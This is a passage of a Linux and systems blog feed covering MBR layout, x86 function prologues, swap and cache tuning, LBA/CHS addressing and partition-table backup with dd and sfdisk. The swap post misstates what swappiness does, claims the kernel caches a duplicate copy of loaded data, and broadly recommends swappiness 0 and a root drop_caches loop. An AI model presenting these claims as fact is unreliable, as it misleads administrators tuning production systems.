<tr><td align="center" class="color" style="background-color: whitesmoke; border-bottom-color: rgb(234, 234, 234); border-bottom-width: 1px; border-style: none none solid; font-size: 14px; line-height: 25px; padding: 2px 2px 2px 5px;">0x54</td><td align="center" class="color" style="background-color: whitesmoke; border-bottom-color: rgb(234, 234, 234); border-bottom-width: 1px; border-style: none none solid; font-size: 14px; line-height: 25px; padding: 2px 2px 2px 5px;"><div class="small" style="color: #454545; font-size: 13px; line-height: 20px; margin-top: 10px; padding-right: 15px;">
426 bytes</div>
</td><td align="center" class="color" style="background-color: whitesmoke; border-bottom-color: rgb(234, 234, 234); border-bottom-width: 1px; border-style: none none solid; font-size: 14px; line-height: 25px; padding: 2px 2px 2px 5px;"><div class="small" style="color: #454545; font-size: 13px; line-height: 20px; margin-top: 10px; padding-right: 15px;">
Bootstrap Code</div>
</td></tr>
<tr><td align="center" style="border-bottom-color: rgb(234, 234, 234); border-bottom-width: 1px; border-style: none none solid; font-size: 14px; line-height: 25px; padding: 2px;">0x01FE </td><td style="border-bottom-color: rgb(234, 234, 234); border-bottom-width: 1px; border-style: none none solid; font-size: 14px; line-height: 25px; padding: 2px;"><div class="small" style="color: #454545; font-size: 13px; line-height: 20px; margin-top: 10px; padding-right: 15px;">
WORD</div>
</td><td style="border-bottom-color: rgb(234, 234, 234); border-bottom-width: 1px; border-style: none none solid; font-size: 14px; line-height: 25px; padding: 2px;"><div class="small" style="color: #454545; font-size: 13px; line-height: 20px; margin-top: 10px; padding-right: 15px;">
End of Sector Marker</div>
</td></tr>
</tbody></table>
</div>
<br /></div>
Anonymoushttp://www.blogger.com/profile/18277613292156954188noreply@blogger.com0tag:blogger.com,1999:blog-6934113520237822184.post-25174089376479210432013-01-08T12:14:00.000-08:002013-01-08T12:14:46.740-08:00Function's Prologue and Epilogue <div dir="ltr" style="text-align: left;" trbidi="on">
In assembly language programming, the function prologue is a few lines of code at the beginning of a function, which prepare the stack and registers for use within the function. Similarly, the function epilogue appears at the end of the function, and restores the stack and registers to the state they were in before the function was called. The prologue and epilogue are not a part of the assembly language itself; they represent a convention used by assembly language programmers, and compilers of many higher-level languages. They are fairly rigid, having the same form in each function. Sometimes, function prologue and epilogue contain also buffer overflow protection code.<br />
<br />
<br />
A function prologue typically does the following actions if the architecture has a base pointer (also known as frame pointer) and a stack pointer (the following actions may not be applicable to those architectures that are missing a base pointer or stack pointer) :<br />
=>Pushes the old base pointer onto the stack, such that it can be restored later (by getting the new base pointer value which is set in the next step and is always pointed to this location).<br />
=>Assigns the value of stack pointer (which is pointed to the saved base pointer and the top of the old stack frame) into base pointer such that a new stack frame will be created on top of the old stack frame (i.e. the top of the old stack frame will become the base of the new stack frame).<br />
=> Moves the stack pointer further by decreasing or increasing its value, depending on whether the stack grows down or up. On x86, the stack pointer is decreased to make room for variables (i.e. the function's local variables).<br />
As an example, here′s a typical IA-32 assembly language function prologue as produced by the GCC:<br />
<b>pushl %ebp </b><br />
<b>movl %esp,%ebp </b><br />
<b>subl $N,%esp</b><br />
<b><br /></b>
<b><br /></b>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXs-FE53dOL16JRaSaK6hvhw98ON9WVWOENyy_zYu0Vu8vlFLfYga0weDUodgg9azSVp9FCsM4I86mY4oaF9HjuYQ14yGc8ARv5SJ2xoKPfrrsPMoBnj4h8V37c5alWtcrG-IRvM53Vmoj/s1600/x86-registers.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXs-FE53dOL16JRaSaK6hvhw98ON9WVWOENyy_zYu0Vu8vlFLfYga0weDUodgg9azSVp9FCsM4I86mY4oaF9HjuYQ14yGc8ARv5SJ2xoKPfrrsPMoBnj4h8V37c5alWtcrG-IRvM53Vmoj/s1600/x86-registers.png" height="300" width="400" /></a></div>
<b><br /></b>
<b><br /></b>
Function epilogue reverses the actions of the function prologue and returns control to the calling function. It typically does the following actions (this procedure may differ from one architecture to another):<br />
=>Replaces the stack pointer with the current base (or frame) pointer, so the stack pointer is restored to its value before the prologue<br />
=>Pops the base pointer off the stack, so it is restored to its value before the prologue<br />
=>Returns to the calling function, by popping the previous frame's program counter off the stack and jumping to it The given epilogue will reverse the effects of either of the above prologues (either the full one, or the one which uses enter). For example, these three steps may be accomplished in 32-bit x86 assembly language by the following instructions (using AT&T syntax):<br />
<b>movl %ebp,%esp </b><br />
<b>popl %ebp </b><br />
<b>ret</b><br />
<br />
<br />
<div style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 19.200000762939453px; margin-bottom: 0.5em; margin-top: 0.4em;">
<br /></div>
</div>
Anonymoushttp://www.blogger.com/profile/18277613292156954188noreply@blogger.com0tag:blogger.com,1999:blog-6934113520237822184.post-3147925148092164182013-01-05T04:13:00.001-08:002013-01-05T04:13:21.148-08:00SWAP AND CACHE DROP PUZZLE SOLVED<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1wtXumukRthynrjQlPo_E7aMOQ_kIw_f_uLPGd1jq2UlcPkj4uG_5VdoKsJRo1OBVQ3gCm9W73ZLLcIQDpASZQTmiInGx7CrFr_HdACTumMGMMN3y0z3ucO1bBNvoQhCiMV7xUxcPAt6u/s1600/memory.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1wtXumukRthynrjQlPo_E7aMOQ_kIw_f_uLPGd1jq2UlcPkj4uG_5VdoKsJRo1OBVQ3gCm9W73ZLLcIQDpASZQTmiInGx7CrFr_HdACTumMGMMN3y0z3ucO1bBNvoQhCiMV7xUxcPAt6u/s1600/memory.jpg" height="315" width="400" /></a></div>
<br />
<br />
In high performance computing it is common for applications to have all of the data in the physical memory to meet performance criticality. When multiple processes communicate, as we know, shared memory serves as the fastest way of IPC. Any such typical application would initialize the shared memory by loading the data from the disk into the shared memory. Now a question arises - what is the maximum data size that an application can hold in the physical memory, of course, without swapping. For the sake of discussion, if we are given a 100GB of RAM, at max, how many giga byte of physical memory (RAM) can I allocate to my data, keeping in mind that the fewer I allocate, the more boxes I would require to split the data gallery. As a test, I wrote a small app to do what I described above. As it loaded around 30 GB of data into the RAM, the kernel started using swap. After loading 40 GB, the swap usage exponentially increased and at one point in time, it stopped responding and I had to physically bounce the box (plug off and plug in again). This din't make sense to me at the beginning. At first, why would the kernel swap if there is enough RAM? I did a man proc and searched for "swap". I happened to read about <b>/proc/sys/vm/swappiness</b> - a parameter which defines the kernel's tendency to swap. The default value of swappiness on ubuntu8.04 is 60. As the "used" RAM size reaches 60% of the total RAM size, the kernel would being to swap. In my case, 60% of 100 GB is 60 GB. But my data size was 30 GB when the kernel started to swap. Where did the remaining 30GB go, eventually leaving my box in a non-responsive state?! Again this intrigued me to do a further search . I could not find the relation between the data size and the memory required to store it. Few more runs and a close memory monitoring showed that the kernel caches all the data (yes, almost all the data that are used very recently). Thus, if an application has loaded 2GB of data into the memory, the kernel would cache 4GB. 2 GB for the actual shared memory data and 2GB of unused cache using which the data was read/copied into the shared memory. On a typical server environment (runlevel 3), you wouldn't expect this to happen, since apart from the main apps no other applications will be running (like yum-updatesd, vlc, rhythmbox, etc). One would expect the kernel to drop the unused cache immediately. proc man page again showed one other important parameter - <b>/proc/sys/vm/drop_caches</b>. This entry point is helpful in instructing the kernel to drop the unused cache. <br />To free pagecache:<br /><b> # echo 1 > /proc/sys/vm/drop_caches </b><br />To free dentries and inodes:<br /> <b># echo 2 > /proc/sys/vm/drop_caches </b><br />To free pagecache, dentries and inodes:<br /><b> # echo 3 > /proc/sys/vm/drop_caches </b><br /><br />
When an application loads all the data into the memory during its initialization and then never tends to read the disk, drop_caches is a real boon. In my case above, I was able to load 90 GB of data into the shared memory and share it with the other processes. The technique was to clear the cache frequently as the application initialized. <br /><b>while :; do echo 3 > /proc/sys/vm/drop_caches sleep 30 done </b><br />As a thumb rule, swappiness must be set to 0 (echo 0 > /proc/sys/vm/swappiness or via sysctl.conf) before the application starts and the drop_caches must be set to 3 periodically to avoid any kind of swaps and performance degradations. Once the app has been initialized and all the 90GB has been loaded into the memory, the while loop to drop the unused cache is not needed and it can be terminated safely. But the moment you do a huge file read, don't forget to run the script in the background, of course, as root. The need to drop_caches entirely depends on your application. Setting swappiness to 0 is ideal in my opinion for all the server environments where you have to run only specific application on systems.<br /></div>
Anonymoushttp://www.blogger.com/profile/18277613292156954188noreply@blogger.com0tag:blogger.com,1999:blog-6934113520237822184.post-24015413768314836412013-01-04T01:44:00.000-08:002013-01-04T01:44:37.687-08:00Block Addressing In Hard Drives<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/9eMWG3fwiEU?feature=player_embedded' frameborder='0'></iframe></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
A hard disk drive (HDD) is a data storage device used for storing and retrieving digital information using rapidly rotating discs (platters) coated with magnetic material. An HDD retains its data even when powered off. Data is read in a random-access manner, meaning individual blocks of data can be stored or retrieved in any order rather than just sequentially. An HDD consists of one or more rigid ("hard") rapidly rotating discs (platters) with magnetic heads arranged on a moving actuator arm to read and write data to the surfaces.</div>
<div class="separator" style="clear: both; text-align: left;">
Following two schemes are used to address the location on hard drive which store some useful information</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<div class="separator" style="clear: both;">
<b>1:)Logical block addressing (LBA)</b> is a common scheme used for specifying the location of blocks of data stored on computer storage devices, generally secondary storage systems such as hard disks.</div>
<div class="separator" style="clear: both;">
LBA is a particularly simple linear addressing scheme; blocks are located by an integer index, with the first block being LBA 0, the second LBA 1, and so on.</div>
<div class="separator" style="clear: both;">
<table border="1" class="wikitable" style="background-color: #f9f9f9; border-collapse: collapse; border: 1px solid rgb(170, 170, 170); color: black; font-family: sans-serif; font-size: 13px; line-height: 19.200000762939453px; margin: 1em 0px; text-align: center;"><caption style="font-weight: bold;">LBA and CHS equivalence with 16 heads per cylinder</caption><tbody>
<tr><th style="background-color: #f2f2f2; border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">LBA Value</th><th style="background-color: #f2f2f2; border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">CHS <i>Tuple</i></th></tr>
<tr><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">0 </td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">0, 0, 1</td></tr>
<tr><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">1 </td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">0, 0, 2</td></tr>
<tr><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">2 </td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">0, 0, 3</td></tr>
<tr><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">62 </td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">0, 0, 63</td></tr>
<tr><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">945 </td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">0, 15, 1</td></tr>
<tr><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">1007 </td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">0, 15, 63</td></tr>
<tr><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">1008 </td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">1, 0, 1</td></tr>
<tr><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">1070 </td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">1, 0, 63</td></tr>
<tr><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">1071 </td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">1, 1, 1</td></tr>
<tr><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">1133 </td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">1, 1, 63</td></tr>
<tr><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">1134 </td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">1, 2, 1</td></tr>
<tr><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">2015 </td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">1, 15, 63</td></tr>
<tr><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">2016 </td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">2, 0, 1</td></tr>
<tr><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">16,127 </td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">15, 15, 63</td></tr>
<tr><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">16,128 </td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">16, 0, 1</td></tr>
<tr><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">32,255 </td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">31, 15, 63</td></tr>
<tr><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">32,256 </td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">32, 0, 1</td></tr>
<tr><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">16,450,559 </td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">16319, 15, 63</td></tr>
<tr><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">16,514,063 </td><td style="border: 1px solid rgb(170, 170, 170); padding: 0.2em; text-align: center;">16382, 15, 63</td></tr>
</tbody></table>
</div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
</div>
<div class="separator" style="clear: both;">
CHS (cylinder/head/sector) tuples can be mapped to LBA address with the following formula:</div>
<div class="separator" style="clear: both; text-align: center;">
<img alt="LBA=((C \times HPC) + H ) \times SPT + S -1 " src="http://upload.wikimedia.org/math/0/5/b/05bdb7a8e2026eae4b7da9e23fb63c40.png" /></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both;">
where,</div>
<div class="separator" style="clear: both;">
C, H and S are the cylinder number, the head number, and the sector number</div>
<div class="separator" style="clear: both;">
LBA is the logical block address</div>
<div class="separator" style="clear: both;">
HPC is the maximum number of heads per cylinder (reported by disk drive, typically 16 for 28-bit LBA)</div>
<div class="separator" style="clear: both;">
SPT is the maximum number of sectors per track (reported by disk drive, typically 63 for 28-bit LBA)</div>
<div class="separator" style="clear: both;">
LBA addresses can be mapped to CHS tuples with the following formula:</div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<img alt="\begin{align}
C &= LBA \div ( SPT \times HPC )\\
H &= ( LBA \div SPT ) \, \bmod \, HPC \\
S &= ( LBA \, \bmod \, SPT ) + 1
\end{align}" src="http://upload.wikimedia.org/math/9/9/c/99cc5b1a90399d50a8d96f68203b5580.png" /></div>
<div>
<br /></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: left;">
<b>2:)Cylinder-head-sector</b>, also known as CHS, was an early method for giving addresses to each physical block of data on a hard disk drive. In the case of floppy drives, for which the same exact diskette medium can be truly low-level formatted to different capacities, this is still true.</div>
<div class="separator" style="clear: both;">
Though CHS values no longer have a direct physical relationship to the data stored on disks, virtual CHS values (which can be translated by disk electronics or software) are still being used by many utility programs.</div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbvcKeD-XpEhvVB57gOkKwnU7duYmWaAIUMqAqubFaDzclI-r64wO1eJ1Vn1B0Tgcxa9haG39JvFFadR1k89J1SE1np4x5xvhrMeQT4oIoi0xmkyKBBbB8yEdzJxh1k0et1FaShmctys2a/s1600/Cylinder_Head_Sector.svg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbvcKeD-XpEhvVB57gOkKwnU7duYmWaAIUMqAqubFaDzclI-r64wO1eJ1Vn1B0Tgcxa9haG39JvFFadR1k89J1SE1np4x5xvhrMeQT4oIoi0xmkyKBBbB8yEdzJxh1k0et1FaShmctys2a/s1600/Cylinder_Head_Sector.svg.png" height="320" width="296" /></a></div>
<div class="separator" style="clear: both;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="text-align: center;">
<br /></div>
</div>
Anonymoushttp://www.blogger.com/profile/18277613292156954188noreply@blogger.com0tag:blogger.com,1999:blog-6934113520237822184.post-25971766120306483242013-01-02T11:01:00.002-08:002013-01-02T11:02:43.155-08:00BACKUP PARTITION TABLE <div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">In computer hardware, GUID Partition Table (GPT) is a standard for the layout of the partition table on a physical hard disk. Although it forms a part of the Extensible Firmware Interface (EFI) standard (Intel's proposed replacement for the PC BIOS), it is also used on some BIOS systems because of the limitations of MBR partition tables, which use 32 bits for storing logical block addresses and size information. For disks with 512-byte sectors, the MBR partition table entries allow up to a maximum of 2.20 TB (2.20 × 1012 bytes) or 2 TiB−512 bytes (2,199,023,255,040 bytes or 4,294,967,295 (232−1) sectors × 512 (29) bytes per sector).[1] GPT allocates 64 bits for logical block addresses and therefore allows a maximum disk and partition size of 264−1 sectors. For disks with 512-byte sectors, that would be 9.4 ZB (9.4 × 1021 bytes)[1][2] or 8 ZiB−512 bytes (9,444,732,965,739,290,426,880 bytes or 18,446,744,073,709,551,615 (264−1) sectors × 512 (29) bytes per sector).</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">Using Following two ways you can store Partition table.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEio8tbcemYqv2XTVSpb4ldp4HeAXA4DjbJWuGq8o91M8PQ60YE71vhlyD12jpEWiIQpUTWx2z_yg1-f-o6_T4X-az7QeYAp0oD4fnEukndeD2nIQMUiBYcFqEyJ50Ds5zxg8ZBYCBSDeHyY/s1600/guid-partition-table-schemesvg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Arial, Helvetica, sans-serif;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEio8tbcemYqv2XTVSpb4ldp4HeAXA4DjbJWuGq8o91M8PQ60YE71vhlyD12jpEWiIQpUTWx2z_yg1-f-o6_T4X-az7QeYAp0oD4fnEukndeD2nIQMUiBYcFqEyJ50Ds5zxg8ZBYCBSDeHyY/s1600/guid-partition-table-schemesvg.png" height="320" width="232" /></span></a></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /><b>1:)</b>dd the old good command which now backup partition tables. Backing up partition is nothing but actually backing up MBR (master boot record). The command is as follows for backing up MBR stored on /dev/sdX or /dev/hdX depending upon whether you are using scsi or ide :</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"># <b>dd if=/dev/sdX of=/tmp/sda-mbr.bin bs=512 count=1</b></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Replace X with actual device name such as /dev/sda.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Now to restore partition table to disk, all you need to do is use dd command:</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;">#<b> dd if= sda-mbr.bin of=/dev/sdX bs=1 count=64 skip=446 seek=446</b></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="background-color: white; color: #111111; line-height: 21.983333587646484px;"> 446 bytes of Bootstrap code, then 4 partition entries x 16 bytes = 64 bytes, then 2 bytes of signature (a 16 bit number = 0101010110101010).<br /><br /><br /><b>2:)</b></span><span style="color: #111111;"><span style="line-height: 21.983333587646484px;">We can get a quick look on all the existing partitions on all the available hard drives with fdisk using the -l switch without any other parameter</span></span></span><br />
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<span style="background-color: white; color: #111111; line-height: 21.983333587646484px;"><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="background-color: white;"></span></span><br />
<span style="color: #111111; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 21.983333587646484px;">mango@pineapple:~$<b> sudo fdisk -l</b></span></span><br />
<span style="color: #111111; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 21.983333587646484px;">[sudo] password for mango: </span></span><br />
<span style="color: #111111; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 21.983333587646484px;"><br /></span></span>
<span style="color: #111111; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 21.983333587646484px;">Disk /dev/sda: 16.1 GB, 16106127360 bytes</span></span><br />
<span style="color: #111111; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 21.983333587646484px;">255 heads, 63 sectors/track, 1958 cylinders</span></span><br />
<span style="color: #111111; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 21.983333587646484px;">Units = cylinders of 16065 * 512 = 8225280 bytes</span></span><br />
<span style="color: #111111; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 21.983333587646484px;">Disk identifier: 0x0000a1e3</span></span><br />
<span style="color: #111111; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 21.983333587646484px;"><br /></span></span>
<span style="color: #111111; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 21.983333587646484px;"> Device Boot Start End Blocks Id System</span></span><br />
<span style="color: #111111; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 21.983333587646484px;">/dev/sda1 * 1 1870 15020743+ 83 Linux</span></span><br />
<span style="color: #111111; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 21.983333587646484px;">/dev/sda2 1871 1958 706860 5 Extended</span></span><br />
<span style="color: #111111; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 21.983333587646484px;">/dev/sda5 1871 1958 706828+ 82 Linux swap / Solaris</span></span><br />
<div style="color: #111111; line-height: 21.983333587646484px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="color: #111111; line-height: 21.983333587646484px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="color: #111111; line-height: 21.983333587646484px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<div>
<span style="color: #111111; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 21.983333587646484px;">mango@pineapple:~$ <b>sudo sfdisk -d /dev/sda</b></span></span></div>
<div>
<span style="color: #111111; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 21.983333587646484px;"># partition table of /dev/sda</span></span></div>
<div>
<span style="color: #111111; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 21.983333587646484px;">unit: sectors</span></span></div>
<div>
<span style="color: #111111; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 21.983333587646484px;"><br /></span></span></div>
<div>
<span style="color: #111111; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 21.983333587646484px;">/dev/sda1 : start= 63, size= 30041487, Id=83, bootable</span></span></div>
<div>
<span style="color: #111111; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 21.983333587646484px;">/dev/sda2 : start= 30041550, size= 1413720, Id= 5</span></span></div>
<div>
<span style="color: #111111; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 21.983333587646484px;">/dev/sda3 : start= 0, size= 0, Id= 0</span></span></div>
<div>
<span style="color: #111111; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 21.983333587646484px;">/dev/sda4 : start= 0, size= 0, Id= 0</span></span></div>
<div>
<span style="color: #111111; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 21.983333587646484px;">/dev/sda5 : start= 30041613, size= 1413657, Id=82</span></span></div>
<div style="color: #111111; line-height: 21.983333587646484px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="color: #111111; line-height: 21.983333587646484px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Using sfdisk with the -d option we can get a dump of the current partition table in a regular file, and if needed we can restore it from that file:</span></div>
<div>
<div>
<span style="color: #111111; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 21.983333587646484px;"><b>sfdisk -d /dev/sda > sdaTable</b></span></span></div>
<div>
<span style="color: #111111; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 21.983333587646484px;">and to restore the partition table:</span></span></div>
<div>
<span style="color: #111111; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 21.983333587646484px;"><b>sfdisk /dev/sda <>sdaTable</b></span></span></div>
<div>
<span style="color: #111111; font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 21.983333587646484px;"><br /></span></span></div>
<div style="color: #111111; font-size: 14px; line-height: 21.983333587646484px;">
<br /></div>
</div>
</div>
<br /></div>
Anonymoushttp://www.blogger.com/profile/18277613292156954188noreply@blogger.com0tag:blogger.com,1999:blog-6934113520237822184.post-89401404217884474662012-12-29T08:57:00.001-08:002012-12-29T08:57:58.764-08:00CCNA Cisco Certification<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNh7e0v_6TbLS4y0_0AXkCLHUGFFKXmj07LRnnQUc_qasVnHp8BaCxuzYsd79NwTUmW6F7N4Jcn13cGiZ_ZWtenXunbvVQwDPu7bo1XI_j2nvjZQUWG_y06tg1rEFC-YAjsvZVM6pTfkGS/s1600/cisco-lab-routers.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNh7e0v_6TbLS4y0_0AXkCLHUGFFKXmj07LRnnQUc_qasVnHp8BaCxuzYsd79NwTUmW6F7N4Jcn13cGiZ_ZWtenXunbvVQwDPu7bo1XI_j2nvjZQUWG_y06tg1rEFC-YAjsvZVM6pTfkGS/s1600/cisco-lab-routers.jpg" height="253" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div style="text-align: center;">
Goto Following link for any Information about CCNA-CISCO CERTIFICATION</div>
<div style="text-align: center;">
http://ccna-rohit.blogspot.in </div>
</div>
Anonymoushttp://www.blogger.com/profile/18277613292156954188noreply@blogger.com12tag:blogger.com,1999:blog-6934113520237822184.post-18645692583705104002012-12-29T08:07:00.002-08:002012-12-29T08:07:40.512-08:00Linux Administration Ebook For Beginners <div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.4shared.com/office/lpElKzfP/Linux_Administration_Handbook.html" target="_blank"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPQXK2P11SEHN5uDbGmCKXE5dD__8J2EbupNM-A_JQJHqOtJ0uN8S5mMNW_yJMAVbHGOg9Pm3cvaFx6h1RRvrBP1hwzXCp72YviOpm1w__LrRoGlfA4MBqrLv2Jo6i84dL2k4AZxLthXNK/s1600/tux2520linux2520distros.jpg" height="320" width="320" /></a></div>
<br /></div>
Anonymoushttp://www.blogger.com/profile/18277613292156954188noreply@blogger.com0tag:blogger.com,1999:blog-6934113520237822184.post-7175320523140865122012-12-28T14:43:00.002-08:002012-12-28T14:44:18.743-08:00ufw - Uncomplicated Firewall<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div class="para" style="background-color: white; border-bottom-width: 0px; border-color: initial; border-image: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; color: #333333; line-height: 19px; margin-bottom: 8px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;">
